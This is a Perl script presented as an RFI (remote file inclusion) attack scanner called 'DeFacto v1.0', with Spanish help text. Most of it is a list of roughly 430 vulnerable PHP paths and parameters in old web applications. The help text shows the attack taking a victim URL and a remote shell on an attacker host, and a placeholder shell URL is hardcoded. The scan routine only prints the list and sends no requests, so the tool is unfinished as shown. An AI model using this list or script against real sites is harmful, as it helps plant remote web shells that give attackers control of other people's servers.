#!/usr/bin/perl -w #DeFacto v1.0 por C1c4Tr1Z #Escanner RFI (430 dir's RFI) use HTTP::Request; use LWP::UserAgent; @rfi=("includes/header.php?systempath=","Gallery/displayCategory.php?basepath=","index.inc.php?PATH_Includes=","nphp/nphpd.php?nphp_config[LangFile]=","include/db.php?GLOBALS[rootdp]=","ashnews.php?pathtoashnews=","ashheadlines.php?pathtoashnews=","modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=","demo/includes/init.php?user_inc=","jaf/index.php?show=","inc/shows.inc.php?cutepath=","poll/admin/common.inc.php?base_path=","pollvote/pollvote.php?pollname=","sources/post.php?fil_config=","modules/My_eGallery/public/displayCategory.php?basepath=","bb_lib/checkdb.inc.php?libpach=","include/livre_include.php?no_connect=lol&chem_absolu=","index.php?from_market=Y&pageurl=","modules/mod_mainmenu.php?mosConfig_absolute_path=","pivot/modules/module_db.php?pivot_path=","modules/4nAlbum/public/displayCategory.php?basepath=","derniers_commentaires.php?rep=","modules/coppermine/themes/default/theme.php?THEME_DIR=","modules/coppermine/include/init.inc.php?CPG_M_DIR=","modules/coppermine/themes/coppercop/theme.php?THEME_DIR=","coppermine/themes/maze/theme.php?THEME_DIR=","allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=","allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=","myPHPCalendar/admin.php?cal_dir=","agendax/addevent.inc.php?agendax_path=","modules/mod_mainmenu.php?mosConfig_absolute_path=","modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=","main.php?page=","default.php?page=","index.php?action=","index1.php?p=","index2.php?x=","index2.php?content=","index.php?conteudo=","index.php?cat=","include/new-visitor.inc.php?lvc_include_dir=","modules/agendax/addevent.inc.php?agendax_path=","shoutbox/expanded.php?conf=","modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=","pivot/modules/module_db.php?pivot_path=","library/editor/editor.php?root=","library/lib.php?root=","e107/e107_handlers/secure_img_render.php?p=","zentrack/index.php?configFile=","main.php?x=","becommunity/community/index.php?pageurl=","GradeMap/index.php?page=","phpopenchat/contrib/yabbse/poc.php?sourcedir=","calendar/calendar.php?serverPath=","calendar/functions/popup.php?serverPath=","calendar/events/header.inc.php?serverPath=","calendar/events/datePicker.php?serverPath=","calendar/setup/setupSQL.php?serverPath=","calendar/setup/header.inc.php?serverPath=","mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=","zentrack/index.php?configFile=","pivot/modules/module_db.php?pivot_path=","inc/header.php/step_one.php?server_inc=","install/index.php?lng=../../include/main.inc&G_PATH=","inc/pipe.php?HCL_path=","include/write.php?dir=","include/new-visitor.inc.php?lvc_include_dir=","includes/header.php?systempath=","support/mailling/maillist/inc/initdb.php?absolute_path=","coppercop/theme.php?THEME_DIR=","zentrack/index.php?configFile=","pivot/modules/module_db.php?pivot_path=","inc/header.php/step_one.php?server_inc=","install/index.php?lng=../../include/main.inc&G_PATH=","inc/pipe.php?HCL_path=","include/write.php?dir=","include/new-visitor.inc.php?lvc_include_dir=","includes/header.php?systempath=","support/mailling/maillist/inc/initdb.php?absolute_path=","coppercop/theme.php?THEME_DIR=","becommunity/community/index.php?pageurl=","shoutbox/expanded.php?conf=","agendax/addevent.inc.php?agendax_path=","myPHPCalendar/admin.php?cal_dir=","yabbse/Sources/Packages.php?sourcedir=","dotproject/modules/projects/addedit.php?root_dir=","dotproject/modules/projects/view.php?root_dir=","dotproject/modules/projects/vw_files.php?root_dir=","dotproject/modules/tasks/addedit.php?root_dir=","dotproject/modules/tasks/viewgantt.php?root_dir=","My_eGallery/public/displayCategory.php?basepath=","modules/My_eGallery/public/displayCategory.php?basepath=","modules/4nAlbum/public/displayCategory.php?basepath=","modules/coppermine/themes/default/theme.php?THEME_DIR=","modules/agendax/addevent.inc.php?agendax_path=","modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=","modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=","modules/coppermine/include/init.inc.php?CPG_M_DIR=","modules/mod_mainmenu.php?mosConfig_absolute_path=","shoutbox/expanded.php?conf=","pivot/modules/module_db.php?pivot_path=","library/editor/editor.php?root=","library/lib.php?root=","e107/e107_handlers/secure_img_render.php?p=","main.php?x=","main.php?page=","index.php?meio.php=","index.php?include=","index.php?inc=","index.php?page=","index.php?pag=","index.php?p=","index.php?x=","index.php?open=","index.php?visualizar=","index.php?pagina=","index2.php?content=","inc/step_one_tables.php?server_inc=","GradeMap/index.php?page=","phpshop/index.php?base_dir=","admin.php?cal_dir=","contacts.php?cal_dir=","convert-date.php?cal_dir=", "album_portal.php?phpbb_root_path=","mainfile.php?MAIN_PATH=","dotproject/modules/files/index_table.php?root_dir=","html/affich.php?base=","gallery/init.php?HTTP_POST_VARS=","pm/lib.inc.php?pm_path=","ideabox/include.php?gorumDir=","index2.php?includes_dir=","forums/toplist.php?phpbb_root_path=","forum/toplist.php?phpbb_root_path=","admin/config_settings.tpl.php?include_path=","include/common.php?include_path=","event/index.php?page=","forum/index.php?includeFooter=","forums/index.php?includeFooter=","forum/bb_admin.php?includeFooter=","forums/bb_admin.php?includeFooter=","language/lang_english/lang_activity.php?phpbb_root_path=","forum/language/lang_english/lang_activity.php?phpbb_root_path=","blend_data/blend_common.php?phpbb_root_path=","master.php?root_path=","includes/kb_constants.php?module_root_path=","forum/includes/kb_constants.php?module_root_path=","forums/includes/kb_constants.php?module_root_path=","classes/adodbt/sql.php?classes_dir=","agenda.php3?rootagenda=","agenda2.php3?rootagenda=","sources/lostpw.php?CONFIG[path]=","topsites/sources/lostpw.php?CONFIG[path]=","toplist/sources/lostpw.php?CONFIG[path]=","sources/join.php?CONFIG[path]=","topsites/sources/join.php?CONFIG[path]=","toplist/sources/join.php?CONFIG[path]=","topsite/sources/join.php?CONFIG[path]=","public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=","extras/poll/poll.php?file_newsportal=","index.php?site_path=","mail/index.php?site_path=","fclick/show.php?path=","show.php?path=","calogic/reconfig.php?GLOBALS[CLPath]=","eshow.php?Config_rootdir=","auction/auction_common.php?phpbb_root_path=","index.php?inc_dir=","calendar/index.php?inc_dir=","modules/TotalCalendar/index.php?inc_dir=","modules/calendar/index.php?inc_dir=","calendar/embed/day.php?path=","ACalendar/embed/day.php?path=","calendar/add_event.php?inc_dir=","claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=","claroline/auth/ldap/authldap.php?includePath=","docebo/modules/credits/help.php?lang=","modules/credits/help.php?lang=","config.php?returnpath=","editsite.php?returnpath=","in.php?returnpath=","addsite.php?returnpath=","includes/pafiledb_constants.php?module_root_path=","phpBB/includes/pafiledb_constants.php?module_root_path=","pafiledb/includes/pafiledb_constants.php?module_root_path=","auth/auth.php?phpbb_root_path=","auth/auth_phpbb/phpbb_root_path=","apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=","apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=","infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=","phpdig/includes/config.php?relative_script_path=","includes/phpdig/includes/config.php?relative_script_path=","includes/dbal.php?eqdkp_root_path=","eqdkp/includes/dbal.php?eqdkp_root_path=","dkp/includes/dbal.php?eqdkp_root_path=","include/SQuery/gameSpy2.php?libpath=","include/global.php?GLOBALS[includeBit]=","topsites/config.php?returnpath=","manager/frontinc/prepend.php?_PX_config[manager_path]=","ubbthreads/addpost_newpoll.php?addpoll=thispath=","forum/addpost_newpoll.php?thispath=","forums/addpost_newpoll.php?thispath=","ubbthreads/ubbt.inc.php?thispath=","forums/ubbt.inc.php?thispath=","forum/ubbt.inc.php?thispath=","forum/admin/addentry.php?phpbb_root_path=","admin/addentry.php?phpbb_root_path=","index.php?f=","index.php?act=","ipchat.php?root_path=","includes/orderSuccess.inc.php?glob[rootDir]=","stats.php?dir[func]=dir[base]=","ladder/stats.php?dir[base]=","ladders/stats.php?dir[base]=","sphider/admin/configset.php?settings_dir=","admin/configset.php?settings_dir=","vwar/admin/admin.php?vwar_root=","modules/vwar/admin/admin.php?vwar_root=","modules/vWar_Account/includes/get_header.php?vwar_root=","modules/vWar_Account/includes/functions_common.php?vwar_root2=","sphider/admin/configset.php?settings_dir=","admin/configset.php?settings_dir=","impex/ImpExData.php?systempath=","forum/impex/ImpExData.php?systempath=","forums/impex/ImpExData.php?systempath=","application.php?base_path=","index.php?theme_path=","become_editor.php?theme_path=","add.php?theme_path=","bad_link.php?theme_path=","browse.php?theme_path=","detail.php?theme_path=","fav.php?theme_path=","get_rated.php?theme_path=","login.php?theme_path=","mailing_list.php?theme_path=","new.php?theme_path=","modify.php?theme_path=","pick.php?theme_path=","power_search.php?theme_path=","rating.php?theme_path=","register.php?theme_path=","review.php?theme_path=","rss.php?theme_path=","search.php?theme_path=","send_pwd.php?theme_path=","sendmail.php?theme_path=","tell_friend.php?theme_path=","top_rated.php?theme_path=","user_detail.php?theme_path=","user_search.php?theme_path=","invoice.php?base_path=","cgi-bin//classes/adodbt/sql.php?classes_dir=","cgi-bin/install/index.php?G_PATH=","cgi-bin/include/print_category.php?dir=","includes/class_template.php?quezza_root_path=","bazar/classified_right.php?language_dir=","classified_right.php?language_dir=","phpBazar/classified_right.php?language_dir=","chat/messagesL.php3?cmd=","phpMyChat/chat/messagesL.php3?cmd=","bbs/include/write.php?dir=","visitorupload.php?cmd=","modules/center/admin/accounts/process.php?module_path]=","index.php?template=","armygame.php?libpath=","lire.php?rub=","pathofhostadmin/?page=","apa_phpinclude.inc.php?apa_module_basedir=","index.php?req_path=","research/boards/encapsbb-0.3.2_fixed/index_header.php?root=","Farsi1/index.php?archive=","index.php?archive=","show_archives.php?template=","forum/include/common.php?pun_root=","pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=","vuln.php?=","cgi-bin//include/write.php?dir=","admin/common.inc.php?basepath=","pm/lib.inc.php?sfx=","pm/lib.inc.php?pm_path=","artmedic-kleinanzeigen-path/index.php?id=","osticket/include/main.php?include_dir=","include/main.php?config[search_disp]=include_dir=","phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=","quick_reply.php?phpbb_root_path=","zboard/include/write.php?dir=","admin/plog-admin-functions.php?configbasedir=","content.php?content=","q-news.php?id=","_conf/core/common-tpl-vars.php?confdir=","votebox.php?VoteBoxPath=","al_initialize.php?alpath=","include/db.php?GLOBALS[rootdp]=","modules/news/archivednews.php?GLOBALS[language_home]=","protection.php?siteurl=","modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=","index2.php?includes_dir=","classes.php?LOCAL_PATH=","extensions/moblog/moblog_lib.php?basedir=","modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=","phpWebLog/include/init.inc.php?G_PATH=","admin/objects.inc.php4?Server=","trg_news30/trgnews/install/article.php?dir=","block.php?Include=","arpuivo.php?data=","setup/index.php?GALLERY_BASEDIR=","include/help.php?base=","index.php?[Home]=","block.php?Include=","examples/phonebook.php?page=","PHPNews/auth.php?path=","include/print_category.php?dir=","skin/zero_vote/login.php?dir=","skin/zero_vote/setup.php?dir=","skin/zero_vote/ask_password.php?dir=","gui/include/sql.php?include_path=","webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=","email.php?login=cer_skin=","PhotoGal/ops/gals.php?news_file=","index.php?custom=","loginout.php?cutepath=","oneadmin/config.php?path[docroot]=","xcomic/initialize.php?xcomicRootPath=","skin/zero_vote/setup.php?dir=","skin/zero_vote/error.php? dir=","admin_modules/admin_module_captions.inc.php?config[path_src_include]=","admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=","admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=","admin_modules/admin_module_edit.inc.php?config[path_src_include]=","admin_modules/admin_module_delimage.inc.php?config[path_src_include]=","admin_modules/admin_module_deldir.inc.php?config[path_src_include]=","src/index_overview.inc.php?config[path_src_include]=","src/index_leftnavbar.inc.php?config[path_src_include]=","src/index_image.inc.php?config[path_src_include]=","src/image-gd.class.php?config[path_src_include]=","src/image.class.php?config[path_src_include]=","src/album.class.php?config[path_src_include]=","src/show_random.inc.php?config[path_src_include]=","src/main.inc.php?config[path_src_include]=","src/index_passwd-admin.inc.php?config[path_admin_include]=","yappa-ng/src/index_overview.inc.php?config[path_src_include]=","admin_modules/admin_module_captions.inc.php?config[path_src_include]=","admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=","admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=","admin_modules/admin_module_edit.inc.php?config[path_src_include]=","admin_modules/admin_module_delimage.inc.php?config[path_src_include]=","admin_modules/admin_module_deldir.inc.php?config[path_src_include]=","src/index_overview.inc.php?config[path_src_include]=","src/image-gd.class.php?config[path_src_include]=","src/image.class.php?config[image_module]=","src/album.class.php?config[path_src_include]=","src/show_random.inc.php?config[path_src_include]=","src/main.inc.php?config[path_src_include]=","includes/db_adodb.php?baseDir=","includes/db_connect.php?baseDir=","includes/session.php?baseDir=","modules/projects/gantt.php?dPconfig[root_dir]=","modules/projects/gantt2.php?dPconfig[root_dir]=","modules/projects/vw_files.php?dPconfig[root_dir]=","modules/admin/vw_usr_roles.php?baseDir=","modules/public/calendar.php?baseDir=","modules/public/date_format.php?baseDir=","modules/tasks/gantt.php?baseDir=","mantis/login_page.php?g_meta_include_file=","phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=","modules/My_eGallery/public/displayCategory.php?basepath=","dotproject/modules/files/index_table.php?root_dir=","nukebrowser.php?filnavn=","bug_sponsorship_list_view_inc.php?t_core_path=","modules/coppermine/themes/coppercop/theme.php?THEME_DIR=","modules/coppermine/themes/maze/theme.php?THEME_DIR=","modules/coppermine/include/init.inc.php?CPG_M_DIR=","includes/calendar.php?phpc_root_path=","includes/setup.php?phpc_root_path=","phpBB/admin/admin_styles.php?mode=","aMember/plugins/db/mysql/mysql.inc.php?config=","admin/lang.php?CMS_ADMIN_PAGE=","inc/pipe.php?HCL_path=","include/write.php?dir=","becommunity/community/index.php?pageurl=","modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=","modules/mod_mainmenu.php?mosConfig_absolute_path=","modules/agendax/addevent.inc.php?agendax_path=","shoutbox/expanded.php?conf=","modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=","index.php?page=","index.php?pag=","index.php?include=","index.php?content=","index.php?cont=","index.php?c=","modules/My_eGallery/index.php?basepath=","modules/newbb_plus/class/forumpollrenderer.php?bbPath=","journal.php?m=","index.php?m=","links.php?c=","forums.php?m=","list.php?c=","user.php?xoops_redirect=","index.php?id=","r.php?url=","CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=","inc/formmail.inc.php?script_root=","include/init.inc.php?G_PATH=","backend/addons/links/index.php?PATH=","modules/newbb_plus/class/class.forumposts.php?bbPath[path]=","modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=","protection.php?siteurl=","htmltonuke.php?filnavn=","mail_autocheck.php?pm_path=","index.php?p=","modules/4nAlbum/public/displayCategory.php?basepath=","e107/e107_handlers/secure_img_render.php?p=","include/new-visitor.inc.php?lvc_include_dir=","community/modules/agendax/addevent.inc.php?agendax_path=","library/editor/editor.php?root=","library/lib.php?root=","zentrack/index.php?configFile=","pivot/modules/module_db.php?pivot_path=","myPHPCalendar/admin.php?cal_dir=","index.php/main.php?x=","os/pointer.php?url=","p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=","db.php?path_local=","phpGedView/individual.php?PGV_BASE_DIRECTORY=","index.php?kietu[url_hit]=","phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=","Sources/Packages.php?sourcedir=","modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=","cgi-bin//gadgets/Blog/BlogModel.php?path="); if ($ARGV[0] eq "" && "--help"){ &help; } &scan; sub help{ print "\n DeFact0 v1.0 by C1c4Tr1Z \n"; print " _ _\n"; print " ((___))\n"; print " [ X X ]\n"; print " \\ /\n"; print " (' ')\n"; print " (U)\n\n"; print "Uso: perl $0 http://www.victima.com/ -c [shell] -r [numero de ,]\n"; print "-c Shell a utilizar (ej. http://www.atacante.com/shell.txt)\n"; print "-r RFI especifico (Opcional)\n\n"; exit; } sub scan{ for($i=0;$i<430;$i++){ $rfitool="http://www.cambiame.com/shell.gif&"; $x=@rfi[$i]; print $i." - ".$x."\n\n"; } }